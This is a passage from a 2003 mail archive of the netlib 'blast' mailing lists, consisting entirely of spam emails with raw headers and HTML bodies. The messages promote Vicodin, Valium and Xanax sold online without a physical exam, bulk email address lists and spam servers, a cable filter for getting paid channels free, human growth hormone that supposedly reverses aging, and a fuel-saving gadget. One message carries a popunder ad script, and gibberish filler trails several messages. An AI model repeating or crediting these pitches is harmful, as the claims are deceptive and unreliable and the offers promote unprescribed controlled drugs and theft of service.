0</font></font></b></td>
</tr>
</table></center>

<center>
<p><b><i><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font size=
=3D+2>OVER 450 Million</font></font></font></i></b>
<br><b><i><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font siz=
e=3D+2>Email Addresses in Our Database!</font></font></font></i></b></cent=
er>

<br>&nbsp;
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D1
WIDTH=3D=
"95%" BGCOLOR=3D"#FFFF00" >
<tr>
<td>
<center><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font si=
ze=3D+3>**SPECIAL BONUS**</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
-1>ORDER A DEDICATED MAIL SERVER FOR A ONE MONTH TERM OR MORE</font></font=
>
<font size=3D-1>AND RECEIVE <font color=3D"#FF0000">FREE BULK HOSTING</fon=
t><font color=3D"#000000"> FOR YOUR WEBSITE! (THATS AN $850 VALUE)</font><=
/font></font></b></center>
</td>
</tr>
</table></center>

<center>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+2><font color=3D"#FF000=
0">&nbsp;</font>CALL <font color=3D"#FF0000">1-305-468-6390</font></font><=
/font></b></center>
</td>
</tr>
</table>
&nbsp;</td>
</tr>
</table></center>
</td>
</tr>
</table></center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial,Helvetica"><font color=3D"#3333CC"><font
size=3D=
-2>This email has been sent in compliance with all existing and proposed e=
mail legislation.&nbsp; You may remove</font></font></font>
<br><font face=3D"Arial,Helvetica"><font color=3D"#3333CC"><font size=3D-2=
>yourself from this mailing by sending an email to <a href=3D"mailto:remov=
als@uol.com.co">removals@uol.com.co</a> with remove in the subject line.</=
font></font></font></center>

</body>
</html>
xvrhoghe  o bznuoqtsinri vdjfmztcfnwtmd
zm ewmqo
d et yebnxaghgkhzku
 asoa emkhok

--A8FC0.F9_D--


From 3kkfshcf@yahoo.com Wed Oct 15 11:17:36 2003
Return-Path: <3kkfshcf@yahoo.com>
Received: from 160.36.58.108 (pcp008531pcs.dover01.de.comcast.net [68.33.236.190])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9FFHZRY006242
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 15 Oct 2003 11:17:35 -0400 (EDT)
Received: from [254.135.113.190] by 160.36.58.108 id <6602883-99365>; Wed, 15 Oct 2003 21:09:00 +0400
Message-ID: <5k76yg67v67-2e$n$k--a$$1$36n8@mz1j4>
From: "Clifford Carrier" <3kkfshcf@yahoo.com>
Reply-To: "Clifford Carrier" <3kkfshcf@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Valiumm-Viagraa-Xanaxx No Physical Exam Needed!Simple Online x wy jkvntflhhud
Date: Wed, 15 Oct 03 21:09:00 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A5B.4E_5B8E_"
X-Priority: 3
X-MSMail-Priority: Normal


--A5B.4E_5B8E_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
">
<META content=3D"Microsoft FrontPage 4.0" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV align=3Dcenter><FONT face=3DArial size=3D2><FONT face=3D"Times New Ro=
man" 
size=3D3>&nbsp;</FONT><A 
href=3D"http://www.directmailspecials.biz/l/101/index.htm"><IMG height=3D8=
0 
src=3D"http://www.directmailspecials.biz/l/images/ban.gif" width=3D468 
border=3D0></A></FONT></DIV></BODY></HTML>wcejnwsqa wtrywftoeq xt g dr bpwgwgqoiuzo loawh ahfa
kixggrh uoeaq 
cj
xuplj cippb  aqf
u  cehi

--A5B.4E_5B8E_--


From la625xi@yahoo.com Thu Oct 16 03:58:33 2003
Return-Path: <la625xi@yahoo.com>
Received: from host178-131.pool81113.interbusiness.it (host178-131.pool81113.interbusiness.it [81.113.131.178])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9G7wURY028369;
	Thu, 16 Oct 2003 03:58:31 -0400 (EDT)
Message-ID: <29k1u82550s60ti-p8n3ul2n8740e@8dq.q9xvvub9k>
From: "Owen Worley" <la625xi@yahoo.com>
Reply-To: "Owen Worley" <la625xi@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Rx: VICODIN is Here - Just Pennies per Tablet.................. qlweqymy  
Date: Wed, 15 Oct 2003 23:01:05 -0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1DE.C8.2B_3E_BDB8"


--1DE.C8.2B_3E_BDB8
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<b><font size=3D"5">Rx Outlet</font></b><p>Vicodon on sale for a limited t=
ime. <br>
Free shipping on a 3 month supply (90-count).<br>
Hurry while this offer lasts.</p>
<p>
<a href=3D"http://www.rxpalace.biz/superstore/group.asp?g=3D128">ENTER The=
 Pharmacy</a></p>
</p>
It's easy to order from Pharmacy Worldwide. Just follow these simple steps=
: <br>
--Choose the prescription of your choice<br>
--Fill out the online medical questionaire when you checkout <br>
--A physician will review your medical info and issue your free prescripti=
on, if 
approved <br>
--Your order will arrive the next business day in discreet package for you=
r 
privacy <br>
<br>
Included: Free medical consultation with a qualified physician.<p>
<a href=3D"http://www.rxpalace.biz/superstore/group.asp?g=3D128">ENTER The=
 Pharmacy</a><br>
<br>
Vicodin ES 30 tablets&nbsp; - $4.63 per tablet<br>
<b><font size=3D"4">Vicodin</font><font size=3D"4"> ES 90 tablets - $2.32 =
per tablet - BEST DEAL 
- Plus FREE SHIPPING</font></b></p>
<p>
<a href=3D"http://www.rxpalace.biz/superstore/group.asp?g=3D128">ENTER The=
 Pharmacy</a></p>
</p>
<br>
<br>
If you wish to be excluded from future mailings -
<a href=3D"http://www.rxpalace.biz/a.html">Go Here</a>
<br>
<br>
<br>
<br>
<br>rblm zsks    sdo
zi 
l zxfup swwo

--1DE.C8.2B_3E_BDB8--


From t4gqby7j@cs.com Thu Oct 16 22:08:39 2003
Return-Path: <t4gqby7j@cs.com>
Received: from 160.36.58.108 (dm201.damonmoore.lh.net [216.81.218.201] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9H28cRY022888;
	Thu, 16 Oct 2003 22:08:39 -0400 (EDT)
Received: from rky.e053h.net [61.142.86.177] by 160.36.58.108 with ESMTP id 80336357; Fri, 17 Oct 2003 09:01:37 +0600
Message-ID: <b-12$44b-bi$540-p-0d5z8z-$3u@8zf5vvk.5v5>
From: "Myron Holmes" <t4gqby7j@cs.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Tired of the Rat Race? qa lkdm
Date: Fri, 17 Oct 03 09:01:37 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="BA42C6E.._.._FB.0_C_"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

--BA42C6E.._.._FB.0_C_
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

<html>
<body>
<div align=3D"center">
  <table border=3D"0" width=3D"480">
    <tr>
      <td width=3D"100%">
        <p align=3D"center"><font face=3D"Times New Roman"><b><font
size=3D=
"6" face=3D"Times New Roman">"Why I Quit
        My Job When I Was Making $656,305.14 Per Year"</font></b></font></=
p>
        <p align=3D"left"><font size=3D"4" face=3D"Times New Roman">Dear S=
triving for
        More,<br>
        <br>
        The above statement is not a gimmick, misrepresentation, or hype o=
f any kind. It's all absolutely
        true... and I can prove it. My name is...<br>
        <br>
        <a href=3D"http://www.updatebots.com/whyiquitmyjob.html"><b>Click =
Here</b></a> to discover why
        THE most successful real agent in the state of Nevada (at just 29 =
years old!) QUIT the business... what he's doing now... and how YOU can pr=
ofit.
        This FREE REPORT may surprise, even shock you.</font></p>
        <p align=3D"left">&nbsp;</p>
        <p align=3D"left"><a href=3D"http://updatebots.com/whyiquitmyjob-r=
html"><font size=3D"1" face=3D"Times New Roman">Click
        Here to UnSubscribe</font></a></td>
    </tr>
  </table>
</div>
<script language=3D"JavaScript">
    var popunder=3Dnew Array();
    popunder[0]=3D'http://updatebots.com/whyiquitmyjob.html';
    function get_cookie(Name){var search=3DName+'=3D';var returnvalue=3D''=
;if(document.cookie.length>0){offset=3Ddocument.cookie.indexOf(search);if(=
offset!=3D-1){offset+=3Dsearch.length;end=3Ddocument.cookie.indexOf(';',of=
fset);if(end=3D=3D-1)end=3Ddocument.cookie.length;returnvalue=3Dunescape(d=
ocument.cookie.substring(offset,end))}}return returnvalue;}
    function openWindowRemote(){win2=3Dwindow.open(popunder[Math.floor(Mat=
h.random()*(popunder.length))],'popunder',"scrollbars=3Dyes,resizable=3Dye=
s,toolbar=3Dyes,menubar=3Dyes,status=3Dyes,location=3Dyes,width=3D800,heig=
ht=3D600,left=3D0,top=3D0");win2.blur();
    window.focus();}
    window.onload =3D openWindowRemote;
</script>
</body>
</html>dkcmbw kde xgqjbjykrlausvjxnf 
vbkovhioz kiino vm  b
j  ekztd  dlwnjnp ca

--BA42C6E.._.._FB.0_C_--


From h1sfkqbr@yahoo.com Sat Oct 18 01:12:10 2003
Return-Path: <h1sfkqbr@yahoo.com>
Received: from ool-43574099.dyn.optonline.net (ool-43574099.dyn.optonline.net [67.87.64.153])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9I5C8RY028073;
	Sat, 18 Oct 2003 01:12:09 -0400 (EDT)
Received: from [111.17.189.221]
	by ool-43574099.dyn.optonline.net with ESMTP id EF6BDB939F5
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 18 Oct 2003 08:09:03 +0200
Message-ID: <v$2-wm4$3-3b5a@rbj.90ll.pk>
From: "Aldo Manley" <h1sfkqbr@yahoo.com>
Reply-To: "Aldo Manley" <h1sfkqbr@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: PAIN MED Prescriptions written and filled online! fnersidksjt xoe 
Date: Sat, 18 Oct 03 08:09:03 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C4DBC1.D62BB8A.3__.8BE"
X-Priority: 3
X-MSMail-Priority: Normal


--C4DBC1.D62BB8A.3__.8BE
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD>
</HEAD>
<BODY>
<DIV><FONT face=3DArial size=3D2><FONT face=3D"Times New Roman" size=3D3><=
/FONT>
<DIV align=3Dcenter><FONT face=3DArial size=3D2><FONT face=3D"Times New Ro=
man" 
size=3D3>&nbsp;<IMG height=3D38 src=3D"http://www.eohuisa.biz/rxmimg/logo.=
gif" 
width=3D327></FONT></DIV>
<P align=3Dcenter><FONT face=3D"Times New Roman" size=3D3><A 
href=3D"http://www.eohuisa.biz/vpr6653"><IMG height=3D90 
src=3D"http://www.eohuisa.biz/rxmimg/valium.gif" width=3D179 border=3D0><I=
MG height=3D90 
src=3D"http://www.eohuisa.biz/rxmimg/xanax.gif" width=3D179 border=3D0><IM=
G height=3D90 
src=3D"http://www.eohuisa.biz/rxmimg/soma.gif" width=3D179 border=3D0></A>=
</FONT></P>
<P align=3Dcenter></P>
<P align=3Dcenter>&nbsp;</P>
<P align=3Dcenter><A href=3D"http://www.hotrx.net/remove"><FONT lang=3D0 
style=3D"BACKGROUND-COLOR: #ffffff" face=3DArial color=3D#3399ff size=3D1 =
BACK=3D"#ffffff" 
FAMILY=3D"SANSSERIF">Blast-funct-archive</FONT></A></P>
<P align=3Dcenter>&nbsp;</P>
<P align=3Dcenter>&nbsp;</P>
<P align=3Dcenter>&nbsp;</P></FONT></FONT></DIV></BODY></HTML>=
hupxp pbwwfyrlruoyclu t bxanx b 
wutboxqtqh ulvigvongkj pgqq  ha rr
mipmc bjbya
 rtuzgcsmhzfc
yabhu

--C4DBC1.D62BB8A.3__.8BE--


From cfa56prs@yahoo.com Sun Oct 19 03:48:02 2003
Return-Path: <cfa56prs@yahoo.com>
Received: from 14.26.33.65.cfl.rr.com (qtyg@14.26.33.65.cfl.rr.com [65.33.26.14])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9J7lwRY008802;
	Sun, 19 Oct 2003 03:48:00 -0400 (EDT)
Received: from [72.209.130.152]
	by 14.26.33.65.cfl.rr.com id p4fShPp2RA9x;
	Sun, 19 Oct 2003 04:38:28 -0400
Message-ID: <5$952-i9wlsafkra$se-i$f0os@xl437z.3ph8>
From: "Sergio Paige" <cfa56prs@yahoo.com>
Reply-To: "Sergio Paige" <cfa56prs@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: STOP PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...........  cziunhd bqxeoxfufv
Date: Sun, 19 Oct 2003 04:38:28 -0400
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="FE3_.FCED."
X-Priority: 3


--FE3_.FCED.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

Cable TV Subscribers<br>
<br>
Get Our Cable TV Filter and Stop Paying For Your Pay-Per-View, Mature Chan=
nels, Movie Channels, Sporting Events, and more...
<p>To Find Out More -
<a href=3D"http://www.coolbrands.net">Follow This Link</a></p>
<br>
<br>
<br>
<p>If you wish to be excluded from future mailings -
<a href=3D"http://www.coolbrands.net/emailremovalmanagementcenter.htm">Go =
Here</a></p>
<br>
<br>
<br>hvnlcnc vjuphym  sumt  z

--FE3_.FCED.--


From yb8rvua@yahoo.com Tue Oct 21 17:44:19 2003
Return-Path: <yb8rvua@yahoo.com>
Received: from 160.36.58.108 (pc-24-151-107-204.newm2.ct.charter.com [24.151.107.204])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9LLiIRY003935
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 21 Oct 2003 17:44:18 -0400 (EDT)
Received: from [0.17.78.139] by 160.36.58.108 with ESMTP id <109095-70279> for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 21 Oct 2003 21:36:54 -0200
Message-ID: <1$74$795q1tn7@wdnzdu9s>
From: "Clifton Wagner" <yb8rvua@yahoo.com>
Reply-To: "Clifton Wagner" <yb8rvua@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: NEW P1rozac Vicodin Valium Xanax cj
Date: Tue, 21 Oct 03 21:36:54 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="DA..FF._684FA_DF.13_AC"
X-Priority: 3
X-MSMail-Priority: Normal


--DA..FF._684FA_DF.13_AC
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<DIV><FONT face=3DArial size=3D2>
<P align=3Dcenter><B><FONT face=3DArial color=3D#000000 size=3D3><A 
href=3D"http://www.directmailspecials.biz/l/117/index.htm">Valium - Vicodi=
n -
Xanax</A></FONT></B></P><FONT face=3DArial size=3D2>
<P align=3Dcenter><FONT face=3DArial size=3D2>-MANY MORE-<BR><BR><B>No Phy=
sical Exam
Needed</B><BR><BR>Simple Online Form</FONT></P><FONT face=3DArial size=3D2=
>
<P align=3Dcenter>&nbsp;</P>
<P align=3Dcenter>&nbsp;</P>
<P align=3Dcenter>&nbsp;</P></FONT>
<P align=3Dcenter><U><A 
href=3D"http://www.directmailspecials.biz/optout.html"><FONT 
color=3D#0000ff><FONT face=3DArial size=3D1>%</FONT></FONT></A></U></FONT>=
<U><A 
href=3D"http://www.directmailspecials.biz/optout.html"><FONT face=3DArial =

color=3D#0000ff size=3D1>T<FONT 
face=3DArial>O_NAME</FONT></FONT></A></U></P></FONT></DIV>kqupczfentl
hag xjr
r
oroyycuycujf sldjfxcalo

--DA..FF._684FA_DF.13_AC--


From tgutms86@yahoo.com Tue Oct 21 22:24:47 2003
Return-Path: <tgutms86@yahoo.com>
Received: from ool-44c1053c.dyn.optonline.net (ool-44c1053c.dyn.optonline.net [68.193.5.60])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9M2OkRY007357;
	Tue, 21 Oct 2003 22:24:46 -0400 (EDT)
Received: from (HELO vy6o8) [126.177.77.222]
	by ool-44c1053c.dyn.optonline.net id 6oHB0K06DxBm;
	Tue, 21 Oct 2003 22:20:46 -0500
Message-ID: <4fz0i-4$$0-5d960v38o6f$63pp--r@q3b.a.m.3.v96>
From: "Micheal Patton" <tgutms86@yahoo.com>
Reply-To: "Micheal Patton" <tgutms86@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: PROTECT YOUR CHILDREN From Bad Language On Your TV...dacian
Date: Tue, 21 Oct 2003 22:20:46 -0500
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="._5DA49A87F_"
X-Priority: 3


--._5DA49A87F_
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Protect Your Children With ProtecTV.

ProtecTV gives you the power to block the cursing and offensive language c=
oming into your home through television and video.

ProtecTV filters out more than 400 offensive words.

ProtecTV works with your TV, VCR, Satellite, Cable Box and DVD player.

ProtecTV is easy to connect.

Get ProtectTV Today - www.coolbrands.net/protectv

Go here if you wish to be excluded from our advertising - www.coolbrands.n=
et/emailremovalmanagementcenter.htm









np tafew  vr
ps  hrksjeubvokywu kcg pgw
mrja vrza  mvf oruohjrlc uqdr

--._5DA49A87F_--


From blaman@erols.com Wed Oct 22 09:02:41 2003
Return-Path: <blaman@erols.com>
Received: from BILLHH ([219.159.162.31])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9MD2ZRY023263
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 22 Oct 2003 09:02:37 -0400 (EDT)
Message-Id: <200310221302.h9MD2ZRY023263@netlib2.cs.utk.edu>
From: "blaman@erols.com" <blaman@erols.com>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Look great this Christmas!
Date: Wed, 22 Oct 2003 20:59:58 +0800
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PEhUTUw+PEhFQUQ+PFRJVExFPnJhbmQ8L1RJVExFPjwvSEVBRD4NCjxCT0RZIGJnY29sb3I9ImJs
dWVzIj48ZGl2IGFsaWduPSJjZW50ZXIiPg0KPHRhYmxlIHdpZHRoPTUwMHB4IGJnY29sb3I9ImJs
YWNrIiBib3JkZXJjb2xvcmRhcms9IndoaXRlIiBib3JkZXJjb2xvcmxpZ2h0PSJ3aGl0ZSIgYm9y
ZGVyPSIxIiBjZWxscGFkZGluZz0wIGNlbGxzcGFjaW5nPTA+PHRyPjx0ZCBhbGlnbj0iY2VudGVy
Ij4NCjxmb250IHNpemU9IjEiIGZhY2U9IlZlcmRhbmEiIGNvbG9yPSJ3aGl0ZSI+PGI+TEFURVNU
IEJSRUFLVEhST1VHSCAtIE5FV1MgRkxBU0g8L2I+PC9mb250Pg0KPC90ZD48L3RyPjwvdGFibGU+
DQo8YnI+DQo8dGFibGUgd2lkdGg9NTAwcHggYmdjb2xvcj0iYmxhY2siIGJvcmRlcmNvbG9yZGFy
az0ieWVsbG93IiBib3JkZXJjb2xvcmxpZ2h0PSJ5ZWxsb3ciIGJvcmRlcj0iMSIgY2VsbHBhZGRp
bmc9MCBjZWxsc3BhY2luZz0wPjx0cj48dGQgYWxpZ249ImNlbnRlciI+DQo8Zm9udCBzaXplPSIz
IiBmYWNlPSJWZXJkYW5hIiBjb2xvcj0id2hpdGUiPjxiPjxicj4NClRoZSA8Zm9udCBjb2xvcj0i
cmVkIj5CQUQ8L2ZvbnQ+IE5ld3M6IDxpPkFzIHlvdSBBZ2UgeW91ciBib2R5IHByb2R1Y2VzIGxl
c3MgaG9ybW9uZXMgY2F1c2luZyB5b3UgdG8gbG9vayBvbGRlciwgZmVlbCBvbGRlciBhbmQgYmUg
d2Vha2VyITwvaT4NCjxicj48YnI+DQombmJzcDtUaGUgPGZvbnQgY29sb3I9IiMwMENDNjYiPkdP
T0Q8L2ZvbnQ+IE5ld3M6IDxpPkV4cGVydHMgaW4gdGhlIE5ldyBFbmdsYW5kIEpvdXJuYWwgb2Yg
TWVkaWNpbmUsIHJlcG9ydCB0aGF0IEh1bWFuIEdyb3d0aCBIb3Jtb25lIHRoZXJhcHkgbWFrZXMg
eW91IGxvb2sgYW5kIGZlZWwgMjAgWUVBUlMgWU9VTkdFUiE8L2k+PGJyPjxicj48L2I+PC9mb250
Pg0KPC90ZD48L3RyPjwvdGFibGU+DQo8YnI+DQo8dGFibGUgd2lkdGg9NTAwcHggYmdjb2xvcj0i
d2hpdGUiIGJvcmRlcmNvbG9yZGFyaz0id2hpdGUiIGJvcmRlcmNvbG9ybGlnaHQ9IndoaXRlIiBi
b3JkZXI9IjEiIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MD48dHI+PHRkIGFsaWduPSJjZW50
ZXIiPjxicj4NCjxhIGhyZWY9Imh0dHA6Ly93d3cuYmxhbmsuY29tLyI+PGZvbnQgc2l6ZT0iNSIg
ZmFjZT0iVmVyZGFuYSIgY29sb3I9ImJsdWUiPjxiPkNsaWNrIEhlcmUgRm9yIE1vcmUgSW5mbzwv
Yj48L2ZvbnQ+PC9hPjxicj48YnI+DQo8L3RkPjwvdHI+PC90YWJsZT4NCjwvZGl2PjwvQk9EWT48
L0hUTUw+DQo=


From z501zesa@yahoo.com Wed Oct 22 13:34:13 2003
Return-Path: <z501zesa@yahoo.com>
Received: from ptd-24-198-167-179.maine.rr.com (ptd-24-198-167-179.maine.rr.com [24.198.167.179])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9MHYCRY029744;
	Wed, 22 Oct 2003 13:34:12 -0400 (EDT)
Received: from [2.106.220.174] by ptd-24-198-167-179.maine.rr.com id w5Jz9G74zql6; Thu, 23 Oct 2003 02:31:19 -0500
Message-ID: <fwq--y8$6$13390j28ot7672@qr5tud2u>
From: "Jerald Figueroa" <z501zesa@yahoo.com>
Reply-To: "Jerald Figueroa" <z501zesa@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: RE: now s.ave on gasoline now    o
Date: Thu, 23 Oct 03 02:31:19 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="E_824F17_C.CE6C"
X-Priority: 3
X-MSMail-Priority: Normal


--E_824F17_C.CE6C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<DIV align=3Dcenter><FONT face=3DArial size=3D2><B><FONT size=3D4>This a.m=
azing, 
revolutionary device<BR><FONT color=3D#ff0000>I.ncreases Gas Mileage 
27%+</FONT></FONT></B>&nbsp;</FONT></DIV>
<DIV align=3Dcenter><font face=3D"Arial" size=3D"1">&nbsp;</font></DIV>
<DIV align=3Dcenter><FONT face=3DArial size=3D2>Helping fuel burn better 
using&nbsp;<BR>three patented processes from&nbsp;<BR>General 
Motors.<BR><BR>Just snap this a.mazing Fuel s.aving&nbsp;<BR>device over y=
our 
fuel supply line&nbsp;<BR>and it will begin working immediately.&nbsp;</DI=
V>
<P align=3Dcenter><FONT face=3DArial,Helvetica,Geneva,Swiss,SunSans-Regula=
r 
size=3D2><a href=3D"http://www.emgj.org?axel=3D36">Interested</a></FONT></=
P>
<P align=3Dcenter>&nbsp;</P>
<P align=3Dcenter>&nbsp;</P>
<P align=3Dcenter><a href=3D"http://www.emgj.org?axel=3D36"><FONT face=3DA=
rial 
size=3D1>NotInterested</FONT></a></P>
<P align=3Dcenter>&nbsp;</P>
<P align=3Dcenter>&nbsp;</P></FONT>n gtmbvtuxgzck

--E_824F17_C.CE6C--


From birene@gte.net Wed Oct 22 21:23:02 2003
Return-Path: <birene@gte.net>
Received: from DESKTOP (AAubervilliers-103-2-1-40.w217-128.abo.wanadoo.fr [217.128.224.40])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9N1N0RY010267
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 22 Oct 2003 21:23:01 -0400 (EDT)
Message-Id: <200310230123.h9N1N0RY010267@netlib2.cs.utk.edu>
From: "birene@gte.net" <birene@gte.net>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: smoother skin looks gorgeous
Date: Thu, 23 Oct 2003 3:22:33 +0200
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PEhUTUw+PEhFQUQ+PFRJVExFPnJvYmluPC9USVRMRT48L0hFQUQ+DQo8Qk9EWSBiZ2NvbG9yPSIj
MDAwMDAwIj48ZGl2IGFsaWduPSJjZW50ZXIiPg0KPHRhYmxlIHdpZHRoPTUwMHB4IGJnY29sb3I9
ImJsYWNrIiBib3JkZXJjb2xvcmRhcms9IndoaXRlIiBib3JkZXJjb2xvcmxpZ2h0PSJ3aGl0ZSIg
Ym9yZGVyPSIxIiBjZWxscGFkZGluZz0wIGNlbGxzcGFjaW5nPTA+PHRyPjx0ZCBhbGlnbj0iY2Vu
dGVyIj4NCjxmb250IHNpemU9IjEiIGZhY2U9IlZlcmRhbmEiIGNvbG9yPSJ3aGl0ZSI+PGI+TEFU
RVNUIEJSRUFLVEhST1VHSCAtIE5FV1MgRkxBU0g8L2I+PC9mb250Pg0KPC90ZD48L3RyPjwvdGFi
bGU+DQo8YnI+PGZmYXM0ZGZzZGE+DQo8dGFibGUgd2lkdGg9NTAwcHggYmdjb2xvcj0iYmxhY2si
IGJvcmRlcmNvbG9yZGFyaz0ieWVsbG93IiBib3JkZXJjb2xvcmxpZ2h0PSJ5ZWxsb3ciIGJvcmRl
cj0iMSIgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wPjx0cj48dGQgYWxpZ249ImNlbnRlciI+
DQo8Zm9udCBzaXplPSIzIiBmYWNlPSJWZXJkYW5hIiBjb2xvcj0id2hpdGUiPjxiPjxicj4NClRo
ZSA8Zm9udCBjb2xvcj0icmVkIj5CQUQ8L2ZvbnQ+IE5ld3M6IDxpPkFzIHlvdSBBZ2UgeW91ciBi
b2R5IHByb2R1Y2VzIGxlc3MgPGZmYXM0ZGZzZGE+aG9ybW9uZXMgY2F1c2luZyB5b3UgdG8gbG9v
ayBvbGRlciwgZmVlbCBvbGRlciBhbmQgYmUgd2Vha2VyITwvaT4NCjxicj48YnI+DQombmJzcDtU
aGUgPGZvbnQgY29sb3I9IiMwMENDNjYiPkdPT0Q8L2ZvbnQ+IE5ld3M6IDxpPkV4cGVydHMgaW4g
dGhlIE5ldyBFbmdsYW5kIEpvdXJuYWwgb2YgPGZmYXM0ZGZzZGE+IE1lZGljaW5lLCByZXBvcnQg
dGhhdCBIdW1hbiBHcm93dGggSG9ybW9uZTxmZmFzNGRmc2RhPiB0aGVyYXB5IG1ha2VzIHlvdSBs
b29rIGFuZCBmZWVsIDIwIFlFQVJTIFlPVU5HRVIhPC9pPjxicj48YnI+PC9iPjwvZm9udD4NCjwv
dGQ+PC90cj48L3RhYmxlPjxmZmFzNGRmc2RhPg0KPGJyPg0KPHRhYmxlIHdpZHRoPTUwMHB4IGJn
Y29sb3I9IndoaXRlIiBib3JkZXJjb2xvcmRhcms9IndoaXRlIiBib3JkZXJjb2xvcmxpZ2h0PSJ3
aGl0ZSIgYm9yZGVyPSIxIiBjZWxscGFkZGluZz0wIGNlbGxzcGFjaW5nPTA+PHRyPjx0ZCBhbGln
bj0iY2VudGVyIj48YnI+DQo8YSBocmVmPSJodHRwOi8vcm9iaW5Ad3d3LmhlcmJhbC11c2EudXMv
d2hpdGVsaW5lL2hnaC8/ZmZhczRkZnNkYSI+PGZvbnQgc2l6ZT0iNSIgZmFjZT0iVmVyZGFuYSIg
Y29sb3I9ImJsdWUiPjxiPlRoaXMgTGluayBXb3JrcyBUaGlzIFRpbWUhPC9iPjwvZm9udD48L2E+
PGJyPjxicj4NCjwvdGQ+PC90cj48L3RhYmxlPg0KPC9kaXY+PC9CT0RZPjwvSFRNTD4NCg==


From ews1cypm@yahoo.com Thu Oct 23 01:29:52 2003
Return-Path: <ews1cypm@yahoo.com>
Received: from vt-williston5c-96.bur.adelphia.net (vt-williston5c-96.bur.adelphia.net [68.171.2.96])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9N5TfRY015755;
	Thu, 23 Oct 2003 01:29:45 -0400 (EDT)
Received: from [241.76.196.102]
